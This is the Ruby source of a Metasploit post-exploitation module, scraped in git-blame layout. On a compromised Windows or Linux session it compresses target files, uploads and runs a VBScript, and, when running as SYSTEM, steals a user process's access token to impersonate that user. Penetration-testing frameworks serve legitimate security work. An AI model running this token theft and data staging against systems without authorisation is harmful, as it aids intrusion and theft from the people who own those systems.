2016-08-02 19:44:58 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
2016-08-17 21:56:09 +00:00
|
|
|
include Msf::Post::Windows::Priv
|
2016-08-02 19:44:58 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Multi Manage File Compressor',
|
|
|
|
'Description' => %q{
|
2016-08-03 16:04:53 +00:00
|
|
|
This module zips a file or a directory. On Linux, it uses the zip command.
|
2016-08-02 19:44:58 +00:00
|
|
|
On Windows, it will try to use remote target's 7Zip if found. If not, it falls
|
|
|
|
back to its own VBScript.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'sinn3r' ],
|
|
|
|
'Platform' => [ 'win', 'linux' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('DESTINATION', [false, 'The destination path']),
|
|
|
|
OptString.new('SOURCE', [true, 'The directory or file to compress'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_program_file_path
|
2016-08-03 16:11:34 +00:00
|
|
|
get_env('ProgramFiles')
|
2016-08-02 19:44:58 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def has_7zip?
|
|
|
|
file?("#{get_program_file_path}\\7-Zip\\7z.exe")
|
|
|
|
end
|
|
|
|
|
|
|
|
def vbs(dest, src)
|
|
|
|
vbs_file = File.read(File.join(Msf::Config.data_directory, "post", "zip", "zip.vbs"))
|
|
|
|
vbs_file << "WindowsZip \"#{src}\",\"#{dest}\""
|
|
|
|
vbs_file
|
|
|
|
end
|
|
|
|
|
2016-08-17 21:56:09 +00:00
|
|
|
def find_pid_by_user(username)
|
|
|
|
computer_name = get_env('COMPUTERNAME')
|
|
|
|
print_status("Searching for PID for #{computer_name}\\\\#{username}")
|
|
|
|
session.sys.process.processes.each do |p|
|
|
|
|
if p['user'] == "#{computer_name}\\#{username}"
|
|
|
|
return p['pid']
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
nil
|
|
|
|
end
|
|
|
|
|
|
|
|
def steal_token
|
|
|
|
current_user = get_env('USERNAME')
|
|
|
|
pid = find_pid_by_user(current_user)
|
|
|
|
|
|
|
|
unless pid
|
|
|
|
fail_with(Failure::Unknown, "Unable to find a PID for #{current_user} to execute .vbs")
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Stealing token from PID #{pid} for #{current_user}")
|
|
|
|
begin
|
|
|
|
session.sys.config.steal_token(pid)
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
# It could raise an exception even when the token is successfully stolen,
|
|
|
|
# so we will just log the exception and move on.
|
|
|
|
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
|
|
|
end
|
|
|
|
|
|
|
|
@token_stolen = true
|
|
|
|
end
|
|
|
|
|
2016-08-02 19:44:58 +00:00
|
|
|
def upload_exec_vbs_zip
|
2016-08-17 21:56:09 +00:00
|
|
|
if is_system?
|
|
|
|
unless session
|
|
|
|
print_error('Unable to decompress with VBS technique without Meterpreter')
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
steal_token
|
|
|
|
end
|
|
|
|
|
2016-08-02 19:44:58 +00:00
|
|
|
script = vbs(datastore['DESTINATION'], datastore['SOURCE'])
|
2016-08-03 16:11:34 +00:00
|
|
|
tmp_path = "#{get_env('TEMP')}\\zip.vbs"
|
2016-08-02 19:44:58 +00:00
|
|
|
print_status("VBS file uploaded to #{tmp_path}")
|
|
|
|
write_file(tmp_path, script)
|
|
|
|
cmd_exec("wscript.exe #{tmp_path}")
|
|
|
|
end
|
|
|
|
|
|
|
|
def do_7zip
|
|
|
|
program_file_path = get_program_file_path
|
|
|
|
output = cmd_exec("#{program_file_path}\\7-Zip\\7z.exe a -tzip \"#{datastore['DESTINATION']}\" \"#{datastore['SOURCE']}\"")
|
|
|
|
vprint_line(output)
|
|
|
|
end
|
|
|
|
|
|
|
|
def do_zip
|
|
|
|
output = cmd_exec("zip -D -d -q -r #{datastore['DESTINATION']} #{datastore['SOURCE']}")
|
|
|
|
vprint_line(output)
|
|
|
|
end
|
|
|
|
|
|
|
|
def windows_zip
|
|
|
|
if has_7zip?
|
|
|
|
print_status("Compressing #{datastore['DESTINATION']} via 7zip")
|
|
|
|
do_7zip
|
|
|
|
else
|
|
|
|
print_status("Compressing #{datastore['DESTINATION']} via VBS")
|
|
|
|
upload_exec_vbs_zip
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def linux_zip
|
|
|
|
print_status("Compressing #{datastore['DESTINATION']} via zip")
|
|
|
|
do_zip
|
|
|
|
end
|
|
|
|
|
2016-08-17 21:56:09 +00:00
|
|
|
def cleanup
|
|
|
|
if @token_stolen && session
|
|
|
|
session.sys.config.revert_to_self
|
|
|
|
print_status('Token restored.')
|
|
|
|
end
|
|
|
|
|
|
|
|
super
|
|
|
|
end
|
|
|
|
|
2016-08-02 19:44:58 +00:00
|
|
|
def run
|
2016-08-17 21:56:09 +00:00
|
|
|
@token_stolen = false
|
|
|
|
|
2016-08-02 19:44:58 +00:00
|
|
|
os = get_target_os
|
|
|
|
case os
|
|
|
|
when Msf::Module::Platform::Windows.realname.downcase
|
|
|
|
windows_zip
|
|
|
|
else
|
|
|
|
linux_zip
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|